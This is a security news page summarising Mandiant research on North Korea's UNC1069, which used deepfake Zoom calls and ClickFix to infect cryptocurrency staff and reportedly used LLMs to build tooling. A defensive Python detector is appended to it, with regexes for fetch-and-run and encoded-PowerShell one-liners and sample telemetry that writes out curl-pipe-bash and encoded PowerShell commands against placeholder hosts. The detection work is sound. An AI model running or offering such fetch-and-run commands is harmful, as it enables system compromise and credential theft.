Security News

Cybersecurity news aggregator

Severity: MEDIUM | Category: Attacks | Source: Dark Reading

North Korea's UNC1069 Hammers Crypto Firms With AI

  • What: North Korean threat actor UNC1069 is targeting cryptocurrency firms using deepfake-powered social engineering strategies.
  • Impact: Cryptocurrency firms are at risk of compromise through the use of compromised accounts and social engineering.

In moving away from traditional banks to focus on Web3 companies, the threat actor is leveraging LLMs, deepfakes, legitimate platforms, and ClickFix.

Alexander Culafi, Senior News Writer, Dark Reading
February 11, 2026
3 Min Read

A financially motivated North Korean threat actor is aiming at cryptocurrency firms with novel deepfake-powered social engineering strategies.

Google Cloud's Mandiant this week published research concerning a threat actor it tracks as UNC1069, which has been active since at least 2018. The research primarily involves one attack in which the attacker used a compromised cryptocurrency executive's Telegram account to target a secondary victim. Attackers used the executive's account to contact the victim, claiming to be the true owner of the account.

"UNC1069 engaged the victim and, after building a rapport, sent a Calendly link to schedule a 30-minute meeting. The meeting link itself directed to a spoofed Zoom meeting that was hosted on the threat actor's infrastructure," Mandiant's Ross Inman and Adrian Hernandez wrote.

The spoofed Zoom call was actually a video, an apparent deepfake posing as a cryptocurrency executive from another company. The video was intended to trick the user into believing they were experiencing audio issues, at which point the attacker would "help" the user troubleshoot by offering instructions. These instructions came in two variants (depending on whether the target was on macOS or Windows) and told the user to run a single command that would kick off the infection chain.
This is classic ClickFix, a social engineering tactic that has gained popularity over the past year. It takes various forms but boils down to the attacker tricking the user into resolving a verification problem or troubleshooting a technical issue, generally by pasting malicious code into a command line.

"Mandiant has observed UNC1069 employing these techniques to target both corporate entities and individuals within the cryptocurrency industry, including software firms and their developers, as well as venture capital firms and their employees or executives," Mandiant's blog post read. "This includes the use of fake Zoom meetings and a known use of AI tools by the threat actor for editing images or videos during the social engineering stage."

UNC1069 Retrains Its Sights

UNC1069 is most likely connected to North Korea, according to Mandiant. Since 2023, the group has shifted its tactics away from traditional spear-phishing techniques and traditional financial companies. Its new focus is the Web3 industry, be it companies like centralized exchanges or relevant individuals at organizations like venture capital firms. Though not the most prominent threat actor conducting cryptocurrency heists, Mandiant said it remains an active threat.

What stands out is UNC1069's social engineering, which in this case leveraged a legitimate executive's account on Telegram, a legitimate Calendly invitation to build a sense of authority, (most likely) deepfake videos, and ClickFix in a sophisticated (if inelegant) chain. The group also relies on large language models (LLMs) like Gemini to conduct research and develop tooling for attacks. In the primary incident described in the blog, the victim ran the malicious commands on their macOS device.
The command installs a backdoor that enables follow-on activity, such as deployment of a downloader for additional tooling, including a second backdoor that communicates with the command server. These additional tools included two data miners that seized a swath of data from the victim's computer, including keychain credentials, browser data, Telegram user data, and Apple Notes user data.

Google did not detail how UNC1069 would monetize this attack in particular, but Mandiant believes this recent incident was a targeted attack intended to enable cryptocurrency theft and to fuel "future social engineering campaigns by leveraging victim's identity and data."

Organizations should take care not to run unverified code or install SDKs from third-party sources, and should verify suspicious meeting requests through a second channel (ideally in person or over the phone). ClickFix techniques are devastating for organizations because they trick the user into compromising themselves. Even now, a couple of lines of code are sometimes all it takes for complete system takeover.
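The ClickFix step above ends with the victim pasting a command into a terminal or Run dialog, and the article does not reproduce the actual commands. As an added defensive illustration (not code from the article or from Mandiant), the following Python detector keys on the general shape instead: a fetch-to-interpreter or encoded-PowerShell one-liner started from an interactive parent process. The telemetry lines, parent-process names and URLs are constructed for the example.

```python
import json
import re

# Interactive parents a human types into: a ClickFix command is pasted here,
# not launched by a scheduler or a build tool. Constructed list, adjust locally.
INTERACTIVE_PARENTS = {"Terminal", "iTerm2", "explorer.exe", "powershell.exe", "cmd.exe"}

# Patterns for "fetch something remote and hand it straight to an interpreter",
# the shape a ClickFix one-liner takes on macOS and Windows.
REMOTE_TO_INTERPRETER = [
    re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(sh|bash|zsh|python3?)\b", re.I),
    re.compile(r"\bbase64\s+(-d|--decode)\b[^|]*\|\s*(sh|bash|zsh)\b", re.I),
    re.compile(r"(iex|invoke-expression)\b.*(downloadstring|invoke-webrequest|iwr)\b", re.I),
    re.compile(r"(downloadstring|invoke-webrequest|iwr)\b.*(iex|invoke-expression)\b", re.I),
    re.compile(r"powershell(\.exe)?\b.*-(e|enc|encodedcommand)\b", re.I),
    re.compile(r"\bmshta\b\s+https?://", re.I),
]

def is_clickfix_candidate(event):
    """Flag a process-start event that looks like a user-pasted ClickFix one-liner."""
    if event.get("parent") not in INTERACTIVE_PARENTS:
        return False
    cmd = event.get("cmdline", "")
    return any(p.search(cmd) for p in REMOTE_TO_INTERPRETER)

def scan(jsonl):
    """Return (user, parent, cmdline) for each matching event; input is JSON lines."""
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if is_clickfix_candidate(ev):
            hits.append((ev["user"], ev["parent"], ev["cmdline"]))
    return hits

# Constructed sample telemetry (not from the incident): two benign lines,
# two ClickFix-shaped lines. The build-server line is ignored because its
# parent is not interactive, which keeps CI pipelines out of the alert queue.
SAMPLE = """
{"user":"alice","parent":"Terminal","cmdline":"git pull origin main"}
{"user":"alice","parent":"Terminal","cmdline":"curl -fsSL https://example.invalid/fix-audio | bash"}
{"user":"bob","parent":"explorer.exe","cmdline":"powershell -w hidden -enc QUJD"}
{"user":"svc-build","parent":"jenkins","cmdline":"curl -fsSL https://example.invalid/tool.sh | bash"}
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print("ClickFix-shaped command:", hit)
```

Pair a hit with the preceding browser or meeting-link activity for the same user to raise confidence before paging anyone.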
